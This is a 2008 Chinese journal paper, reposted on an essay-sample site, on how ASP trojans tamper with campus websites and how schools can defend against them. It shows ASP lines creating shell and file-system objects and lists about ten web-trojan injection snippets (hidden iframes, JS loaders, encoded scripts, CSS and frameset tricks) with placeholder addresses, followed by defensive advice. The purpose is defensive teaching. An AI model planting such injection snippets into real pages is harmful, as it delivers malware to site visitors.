校园网页被篡改的研究与防范
开篇:润墨网以专业的文秘视角,为您筛选了一篇校园网页被篡改的研究与防范范文,如需获取更多写作素材,在线客服老师一对一协助。欢迎您的阅读与分享!
摘要:如何解决不法黑客的恶意攻击,如何保证校园网页不被篡改,防止自身形象受到损失,以及如何解决由此带来的其它多方面的问题,已经成为信息技术的一个前沿课题。
关键词:网页篡改;ASP木马;FSO组件
中图分类号:TP393文献标识码:A文章编号:1009-3044(2008)34-1952-02
Campus Website has been Tampered with the Research and Prevention
ZHANG Ling, LIU Sheng-zhen, YANG Xiao-hua
(Shangqiu Medical College, Shangqiu 476100, China)
Abstract: how to solve the illegal malicious hackers to attack, how to ensure that the school's website will not be tampered with to prevent the loss of self-image and how to solve the resulting wide range of other issues, Information technology has become a cutting-edge issues.
Key words: page tampering; ASP horse; FSO components
1 引言
在社会信息化飞速发展的今天,计算机网络已经成为高校工作和生活的一部分,高校开始通过网络校园新闻、通知公告、招生查询和校园办公等等。而越来越多的高校为了适应社会的发展,树立自身良好的形象,扩大自身在社会的影响,都已经在Internet中建立起自己的网站。这些网站往往代表高校的形象,但网站却常常成为黑客攻击的首选对象。黑客通过各种手段攻击网页的漏洞,从而获取、破坏、篡改各种重要信息,给各高校造成重大的经济损失和恶劣的社会影。如何解决不法黑客的恶意攻击,如何保证网站页面不被篡改,防止自身形象受到损失,以及如何解决由此带来的其它多方面的问题,已经成为信息技术的一个前沿课题。
2 什么是ASP木马
它其实就是用ASP编写的网站程序,甚至有些ASP木马就是由ASP网站管理程序修改而来的。和其它ASP程序没有本质区别,只要能运行ASP的服务器就能运行它,这种性质使得ASP木马非常不易被发觉。和其它ASP程序的区别在于ASP木马是入侵者上传到目标空间,并帮助入侵者控制目标空间的ASP程序。要想禁止ASP木马运行就等于禁止ASP的运行,显然这是行不通的,这也是为什么ASP木马猖獗的原因。
3 入侵原理
首先分析如下代码:
Set o script = Server.CreateObject("W script .SHELL") "建立了一个名为o script的W script.SHELL对象,用于命令的执行"
Set o script Net = Server.CreateObject("W script .NETWORK")
Set oFileSys = Server.CreateObject("script ing.FileSystemObject")
ASP木马主要是通过以上3个组件运行,第一个是FSO组件,需要FSO支持也就是" script ing.FileSystemObject"项的支持,是不是删除这个组件就可以了,不可以的,因为现在很多程序都是要用到FSO这个组件的,所以不能限制,不然正常的程序也运行不了。第二个是“shell.application”和“Wscript.SHELL”等危险组件。一般的木马都是要使用这几个组件的,即使你把FSO组件限制的话,你不去限制其它组件,一样不能起到防范的效果,对于FSO组件之外的其它的几个组件,我们平时用的很少,所以我们可以直接在注册表中的HKEY_CLASSES_ROOT中找到,找到“shell.application”、“W script.SHELL”等危险的脚本对象(因为它们都是用于创建脚本命令的通道)进行改名或删除,也就是限制系统对“脚本SHELL”的创建,ASP木马也就成为无本之木、无米之炊,运行不起来。要想入侵,就要将ASP木马上传到目标服务器,这点很重要, 那么入侵者如何上传ASP木马呢?入侵者多是利用服务器中已有的具有上传功能的ASP程序来实现的。正常情况下,这些可以上传文件的ASP程序都是有权限限制的,大多也限制了ASP文件的上传。(比如:可以上传图片新闻、图片管理程序、及可以上传更多类型文件的论坛程序等)但由于存在人为的ASP设置错误及ASP程序本身的漏洞,给了入侵者可乘之机,实现上传ASP木马。只要ASP木马上传到目标服务器,入侵者就可以运行它,完成对目标服务器的控制。
4 几个常见的挂马实例
1) 框架挂马
<iframe src=“地址” width=0 height=0></iframe>
2) js文件挂马
首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>")
保存为xxx.js, 则JS挂马代码为
<script language=javascript src=xxx.js></script>
3) js变形加密
<SCRIPT language="JScript.Encode" src=地址></script>
4) body挂马
<body ></body>
5) 隐蔽挂马
top.document.body.innerHTML=op.document.body.innerHTML+'\r\n
<iframe src="地址"></iframe>';
6) css中挂马
body
{
background-image:url('javascript:document.write("<script src=地址></script>")')
}
7) 图片伪装
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>
9) 伪装调用
<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
10) 高级欺骗
<a href="http://地址" >页面要显示的内容</a>
<SCRIPT Language="JavaScript">
function wang ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,
resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10")
}
5 防范措施
首先大家可以根据下面的安全级别,评估一下自己网站被ASP木马入侵的风险度。
网站中没有任何上传程序和论坛程序――非常安全;
网站中有上传程序或论坛程序,只有管理员可以上传,并对程序数据库做了保护措施――一般安全;
网站中有上传程序或论坛程序,有许多用户可以上传程序,对程序数据库没有做保护措施――非常危险。
这个安全级别只是让大家对学校服务器的安全有一个初步认识,接下来我们要说说具体的防范措施了。
1) 我们建议学校通过ftp来上传、维护网页,尽量不安装ASP的上传程序。
2) 对ASP上传程序的调用一定要进行身份认证,并只允许信任的人使用上传程序。可以在不需要上传时将实现上传的ASP文件改名或删除,如upload.ASP、upfile.ASP等,然后在需要使用时再通过ftp恢复原名或重新上传。
3) ASP程序管理员的用户名和密码要有一定复杂性,不能过于简单,还要注意定期更换。
4) 到正规网站下载ASP程序,下载后要对其数据库名称和存放路径进行修改,数据库文件名称也要有一定复杂性。建议学校使用.mdb的数据库文件扩展名,因为学校服务器设置了.mdb文件防下载功能。
5) 要尽量保持程序是最新版本。
6) 不要在网页上加注后台管理程序登陆页面的链接。
7) 为防止程序有未知漏洞,可以在维护后删除后台管理程序的登陆页面,下次维护时再通过ftp上传即可。
8) 要时常备份数据库等重要文件。
9) 日常要多维护,并注意服务器中是否有来历不明的ASP文件。尤其是用来专门存放上传文件的目录,如:uploadfile、uploadsoft等。如果发现不明的*.ASP或*.exe文件应该立即删除,因为这些文件有90%的可能是入侵程序。
10) 一旦发现被入侵,除非学校自己能识别出所有木马文件,否则要删除所有文件。重新上传文件前,所有ASP程序用户名和密码都要重置,并要重新修改程序数据库名称和存放路径以及后台管理程序的路径。
11) 安装入侵检测系统,及时更新杀毒软件。
6 结束语
总之,防范ASP木马的重点就在于如何确保学校服务器中ASP上传程序的安全。只要大家能按照上述几种防范措施操作,我们的网页就能得到安全保护,从而大大降低网页被篡改的可能性。
参考文献:
[1] 石志国.计算机网络安全教程[M].北京:北京交通大学出版社,2004.
[2] 张军.ASP动态网站设计经典案例[M].北京:机械工业出版社,2005.
[3] 童爱红.ASP动态网页设计实用教材[M].北京:清华大学出版社,2007.